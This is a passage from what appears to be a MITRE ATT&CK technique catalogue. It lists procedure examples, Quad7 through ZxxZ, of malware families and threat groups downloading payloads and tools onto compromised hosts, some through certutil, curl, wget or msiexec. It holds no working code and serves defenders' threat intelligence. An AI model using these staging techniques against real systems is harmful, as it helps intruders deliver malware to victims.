Quad7 Activity

Quad7 Activity has downloaded additional binaries from a remote File Transfer Protocol (FTP) server to compromised devices.[484]

S0262

QuasarRAT

QuasarRAT can download files to the victim’s machine and execute them.[485][486]

S0686

QuietSieve

QuietSieve can download and execute payloads on a target host.[239]

S1148

Raccoon Stealer

Raccoon Stealer downloads various library files enabling interaction with various data stores and structures to facilitate follow-on information theft.[487][488]

S0629

RainyDay

RainyDay can download files to a compromised host.[404]

G0075

Rancor

Rancor has downloaded additional malware, including by using certutil.[181]

S0055

RARSTONE

RARSTONE downloads its backdoor component from a C2 server and loads it directly into memory.[489]

S1130

Raspberry Robin

Raspberry Robin retrieves its second stage payload in a variety of ways such as through msiexec.exe abuse, or running the curl command to download the payload to the victim's %AppData% folder.[490][491]

S0241

RATANKBA

RATANKBA uploads and downloads information.[492][493]

S0662

RCSession

RCSession has the ability to drop additional files to an infected machine.[494]

S0495

RDAT

RDAT can download files via DNS.[495]

S0153

RedLeaves

RedLeaves is capable of downloading a file from a specified URL.[496]

S1240

RedLine Stealer

RedLine Stealer has the ability download additional payloads.[497][498]

C0056

RedPenguin

During RedPenguin, UNC3886 used backdoor malware capable of downloading files to compromised infrastructure.[499]

S0511

RegDuke

RegDuke can download files from C2.[339]

S1187

reGeorg

reGeorg has the ability to download files to targeted systems.[405]

S0332

Remcos

Remcos can upload and download files to and from the victim’s machine.[500][501]

S0166

RemoteCMD

RemoteCMD copies a file over to the remote system before execution.[502]

S0592

RemoteUtilities

RemoteUtilities can upload and download files to and from a target machine.[393]

S0125

Remsec

Remsec contains a network loader to receive executable modules from remote attackers and run them on the local victim. It can also upload and download files over HTTP and HTTPS.[503][504]

S0379

Revenge RAT

Revenge RAT has the ability to upload and download files.[505]

S0496

REvil

REvil can download a copy of itself from an attacker controlled IP address to the victim machine.[506][507][508]

S0258

RGDoor

RGDoor uploads and downloads files to and from the victim’s machine.[509]

S1222

RIFLESPINE

RIFLESPINE can download and execute files.[510]

G0106

Rocke

Rocke used malware to download additional malicious files to the target system.[511]

S0270

RogueRobin

RogueRobin can save a new file to the system from the C2 server.[512][513]

S0240

ROKRAT

ROKRAT can retrieve additional malicious payloads from its C2 server.[514][515][37][516]

S0148

RTM

RTM can download additional files.[517][518]

S0085

S-Type

S-Type can download additional files onto a compromised host.[379]

S1018

Saint Bot

Saint Bot can download additional files onto a compromised host.[439]

S0074

Sakula

Sakula has the capability to download files.[519]

S1168

SampleCheck5000

SampleCheck5000 can download additional payloads to compromised hosts.[438][419]

S1099

Samurai

Samurai has been used to deploy other malware including Ninja.[144]

G0034

Sandworm Team

Sandworm Team has pushed additional malicious tools onto an infected system to steal user credentials, move laterally, and destroy data.[520][521]

S1085

Sardonic

Sardonic has the ability to upload additional malicious files to a compromised machine.[522]

G1015

Scattered Spider

Scattered Spider has downloaded the Teleport remote access tool to compromised VMware vCenter Servers.[523]

S0461

SDBbot

SDBbot has the ability to download a DLL from C2 to a compromised host.[524]

S0053

SeaDuke

SeaDuke is capable of uploading and downloading files.[525]

S0345

Seasalt

Seasalt has a command to download additional files.[84][84]

S0185

SEASHARPEE

SEASHARPEE can download remote files onto victims.[526]

S0382

ServHelper

ServHelper may download additional files to execute.[527][528]

S0639

Seth-Locker

Seth-Locker has the ability to download and execute files on a compromised host.[529]

S0596

ShadowPad

ShadowPad has downloaded code from a C2 server.[530]

C0045

ShadowRay

During ShadowRay, threat actors downloaded and executed the XMRig miner on targeted hosts.[531]

S9008

Shai-Hulud

Shai-Hulud has downloaded packages from code repositories.[532][533][534][535] Shai-Hulud has also downloaded and executed the secrets-discovery tool TruffleHog to gather sensitive data.[536][533][537][534][535]

S0140

Shamoon

Shamoon can download an executable to run on the victim.[538]

C0058

SharePoint ToolShell Exploitation

During SharePoint ToolShell Exploitation, threat actors used a loader to download and execute ransomware.[539]

S1019

Shark

Shark can download additional files from its C2 via HTTP or DNS.[377][540]

S1089

SharpDisco

SharpDisco has been used to download a Python interpreter to C:\Users\Public\WinTN\WinTN.exe as well as other plugins from external sources.[186]

S0546

SharpStage

SharpStage has the ability to download and execute additional payloads via a DropBox API.[195][196]

S0450

SHARPSTATS

SHARPSTATS has the ability to upload and download files.[541]

S0444

ShimRat

ShimRat can download additional files.[542]

S0445

ShimRatReporter

ShimRatReporter had the ability to download additional payloads.[542]

S0217

SHUTTERSPEED

SHUTTERSPEED can download and execute an arbitary executable.[34]

S0589

Sibot

Sibot can download and execute a payload onto a compromised system.[253]

G1008

SideCopy

SideCopy has delivered trojanized executables via spearphishing emails that contacts actor-controlled servers to download malicious payloads.[9]

S0610

SideTwist

SideTwist has the ability to download additional files.[543]

G0121

Sidewinder

Sidewinder has used LNK files to download remote files to the victim's network.[544][545]

G0091

Silence

Silence has downloaded additional modules and malware to victim’s machines.[546]

S0692

SILENTTRINITY

SILENTTRINITY can load additional files and tools, including Mimikatz.[547]

S0468

Skidmap

Skidmap has the ability to download files on an infected host.[548]

S1110

SLIGHTPULSE

RAPIDPULSE can transfer files to and from compromised hosts.[549]

S0633

Sliver

Sliver can download additional content and files from the Sliver server to the client residing on the victim machine using the upload command.[550][551]

S0533

SLOTHFULMEDIA

SLOTHFULMEDIA has downloaded files onto a victim machine.[552]

S0218

SLOWDRIFT

SLOWDRIFT downloads additional payloads.[34]

S1035

Small Sieve

Small Sieve has the ability to download files.[553]

S0226

Smoke Loader

Smoke Loader downloads a new version of itself once it has installed. It also downloads additional plugins.[554]

S0649

SMOKEDHAM

SMOKEDHAM has used Powershell to download UltraVNC and ngrok from third-party file sharing sites.[555]

S1086

Snip3

Snip3 can download additional payloads to compromised systems.[556][557]

S1124

SocGholish

SocGholish can download additional malware to infected hosts.[558][559]

S0627

SodaMaster

SodaMaster has the ability to download additional payloads from C2 to the targeted system.[201]

S1166

Solar

Solar has the ability to download and execute files.[438]

C0024

SolarWinds Compromise

During the SolarWinds Compromise, APT29 downloaded additional malware, such as TEARDROP and Cobalt Strike, onto a compromised host following initial access.[560]

S0615

SombRAT

SombRAT has the ability to download and execute additional payloads.[159][182][561]

S0516

SoreFang

SoreFang can download additional payloads from C2.[562][563]

S0374

SpeakUp

SpeakUp downloads and executes additional files from a remote server. [564]

S1140

Spica

Spica can upload and download files to and from compromised hosts.[565]

S0646

SpicyOmelette

SpicyOmelette can download malicious files from threat actor controlled AWS URL's.[566]

S0390

SQLRat

SQLRat can make a direct SQL connection to a Microsoft database controlled by the attackers, retrieve an item from the bindata table, then write and execute the file on disk.[567]

S1030

Squirrelwaffle

Squirrelwaffle has downloaded and executed additional encoded payloads.[568][569]

S1112

STEADYPULSE

STEADYPULSE can add lines to a Perl script on a targeted server to import additional Perl modules.[570]

S0380

StoneDrill

StoneDrill has downloaded and dropped temporary files containing scripts; it additionally has a function to upload files from the victims machine.[571]

G1046

Storm-1811

Storm-1811 has used scripted cURL commands, BITSAdmin, and other mechanisms to retrieve follow-on batch scripts and tools for execution on victim devices.[572][573][574]

S1183

StrelaStealer

StrelaStealer installers have used obfuscated PowerShell scripts to retrieve follow-on payloads from WebDAV servers.[575]

S1034

StrifeWater

StrifeWater can download updates and auxiliary modules.[576]

S0491

StrongPity

StrongPity can download files to specified targets.[577]

S0559

SUNBURST

SUNBURST delivered different payloads, including TEARDROP in at least one instance.[560]

S1064

SVCReady

SVCReady has the ability to download additional tools such as the RedLine Stealer to an infected host.[578]

S9001

SystemBC

SystemBC has downloaded additional files for execution on the victim’s machine.[579][580] The server component of SystemBC has the ability to send additional files to victim machines.[580]

S0663

SysUpdate

SysUpdate has the ability to download files to a compromised host.[440][581]

G1018

TA2541

TA2541 has used malicious scripts and macros with the ability to download additional payloads.[582]

G0092

TA505

TA505 has downloaded additional malware to execute on victim systems.[583][528][584]

G0127

TA551

TA551 has retrieved DLLs and installer binaries for malware execution from C2.[585]

S0011

Taidoor

Taidoor has downloaded additional files onto a compromised host.[586]

S0586

TAINTEDSCRIBE

TAINTEDSCRIBE can download additional modules from its C2 server.[587]

S1193

TAMECAT

TAMECAT has used wget and curl to download additional content.[409]

S0164

TDTESS

TDTESS has a command to download and execute an additional file.[588]

G0139

TeamTNT

TeamTNT has the curl and wget commands as well as batch scripts to download new tools.[589][590]

S0595

ThiefQuest

ThiefQuest can download and execute payloads in-memory or from disk.[591]

G0027

Threat Group-3390

Threat Group-3390 has downloaded additional malware and tools, including through the use of certutil, onto a compromised host .[280][592]

S0665

ThreatNeedle

ThreatNeedle can download additional tools to enable lateral movement.[330]

S0668

TinyTurla

TinyTurla has the ability to act as a second-stage dropper used to infect the system with additional malware.[593]

S0671

Tomiris

Tomiris can download files and execute them on a victim's system.[594]

S1239

TONESHELL

TONESHELL has the ability to download additional files to the victim device.[595]

G0131

Tonto Team

Tonto Team has downloaded malicious DLLs which served as a ShadowPad loader.[596]

S0266

TrickBot

TrickBot downloads several additional files and saves them to the victim's machine.[597][598]

S0094

Trojan.Karagany

Trojan.Karagany can upload, download, and execute files on the victim.[599][600]

G0081

Tropic Trooper

Tropic Trooper has used a delivered trojan to download additional files.[601]

S0436

TSCookie

TSCookie has the ability to upload and download files to and from the infected host.[602]

S9034

Tsundere Botnet

Tsundere Botnet’s loader component has downloaded the zip file node-v18.17.0-win-x64.zip from the official Node.js website, as well as pm2, a Node.js process management tool.[603]

S0647

Turian

Turian can download additional files and tools from its C2.[64]

G0010

Turla

Turla has used shellcode to download Meterpreter after compromising a victim.[604]

S0199

TURNEDUP

TURNEDUP is capable of downloading additional files.[605]

S0263

TYPEFRAME

TYPEFRAME can upload and download files to the victim’s machine.[606]

S0333

UBoatRAT

UBoatRAT can upload and download files to the victim’s machine.[607]

S0130

Unknown Logger

Unknown Logger is capable of downloading remote files.[67]

S0275

UPPERCUT

UPPERCUT can download and upload files to and from the victim’s machine.[608][609][610]

S0022

Uroburos

Uroburos can use a Put command to write files to an infected machine.[611]

S0386

Ursnif

Ursnif has dropped payload and configuration files to disk. Ursnif has also been used to download and execute additional payloads.[612][613]

S0476

Valak

Valak has downloaded a variety of modules and payloads to the compromised host, including IcedID and NetSupport Manager RAT-based malware.[614][615]

S0636

VaporRage

VaporRage has the ability to download malicious shellcode to compromised systems.[96]

S0207

Vasport

Vasport can download files.[616]

S0442

VBShower

VBShower has the ability to download VBS files to the target computer.[617]

S0257

VERMIN

VERMIN can download and upload files to the victim's machine.[618]

S1217

VIRTUALPITA

VIRTUALPITA has the ability to upload and download files.[619]

G1055

VOID MANTICORE

VOID MANTICORE has deployed additional payloads from dedicated C2 servers.[620][621][622] VOID MANTICORE has also downloaded legitimate tools and software from publicly available services.[620] VOID MANTICORE had utilized VeraCrypt a legitimate disk encrypting utility that was downloaded directly from the website.[620]

G0123

Volatile Cedar

Volatile Cedar can deploy additional tools.[130]

S0180

Volgmer

Volgmer can download remote files and additional payloads to the victim's machine.[623][624][625]

G1017

Volt Typhoon

Volt Typhoon has downloaded an outdated version of comsvcs.dll to a compromised domain controller in a non-standard folder.[626]

S0670

WarzoneRAT

WarzoneRAT can download and execute additional files.[627]

C0037

Water Curupira Pikabot Distribution

Water Curupira Pikabot Distribution used Curl.exe to download the Pikabot payload from an external server, saving the file to the victim machine's temporary directory.[628]

S0579

Waterbear

Waterbear can receive and load executables from remote C2 servers.[629]

S0109

WEBC2

WEBC2 can download and execute a file.[630]

S0515

WellMail

WellMail can receive data and executable scripts from C2.[631]

S0514

WellMess

WellMess can write files to a compromised host.[27][632]

S0689

WhisperGate

WhisperGate can download additional stages of malware from a Discord CDN channel.[633][634][635][636]

G0107

Whitefly

Whitefly has the ability to download additional tools from the C2.[637]

S0206

Wiarp

Wiarp creates a backdoor through which remote attackers can download files.[638]

G0112

Windshift

Windshift has used tools to deploy additional payloads to compromised hosts.[639]

S0430

Winnti for Linux

Winnti for Linux has the ability to deploy modules directly from command and control (C2) servers, possibly for remote command execution, file exfiltration, and socks5 proxying on the infected host. [640]

S0141

Winnti for Windows

The Winnti for Windows dropper can place malicious payloads on targeted systems.[641]

G0044

Winnti Group

Winnti Group has downloaded an auxiliary program named ff.exe to infected machines.[642]

G1035

Winter Vivern

Winter Vivern executed PowerShell scripts to create scheduled tasks to retrieve remotely-hosted payloads.[643]

S1115

WIREFIRE

WIREFIRE has the ability to download files to compromised devices.[644]

G0090

WIRTE

WIRTE has downloaded PowerShell code from the C2 server to be executed.[645]

G0102

Wizard Spider

Wizard Spider can transfer malicious payloads such as ransomware to compromised machines.[646]

S1065

Woody RAT

Woody RAT can download files from its C2 server, including the .NET DLLs, WoodySharpExecutor and WoodyPowerSession.[647]

S0341

Xbash

Xbash can download additional malicious files from its C2 server.[648]

S0653

xCaon

xCaon has a command to download files to the victim's machine.[97]

S0658

XCSSET

XCSSET downloads browser specific AppleScript modules using a constructed URL with the curl command, https://" & domain & "/agent/scripts/" & moduleName & ".applescript.[649]

S1248

XORIndex Loader

XORIndex Loader has been used to download a malicious payload to include BeaverTail.[78]

S0388

YAHOYAH

YAHOYAH uses HTTP GET requests to download other files that are executed in memory.[650]

S0251

Zebrocy

Zebrocy obtains additional code to execute on the victim's machine, including the downloading of a secondary payload.[651][123][652][23]

S0230

ZeroT

ZeroT can download additional payloads onto the victim.[653]

S0330

Zeus Panda

Zeus Panda can download additional malware plug-in modules and execute them on the victim’s machine.[654]

S1114

ZIPLINE

ZIPLINE can download files to be saved on the compromised system.[644][110]

G0128

ZIRCONIUM

ZIRCONIUM has used tools to download malicious files to compromised hosts.[655]

S0086

ZLib

ZLib has the ability to download files.[379]

S0672

Zox

Zox can download files to a compromised machine.[275]

S0412

ZxShell

ZxShell has a command to transfer files from a remote host.[656]

S1013

ZxxZ

ZxxZ can download and execute additional files.[89]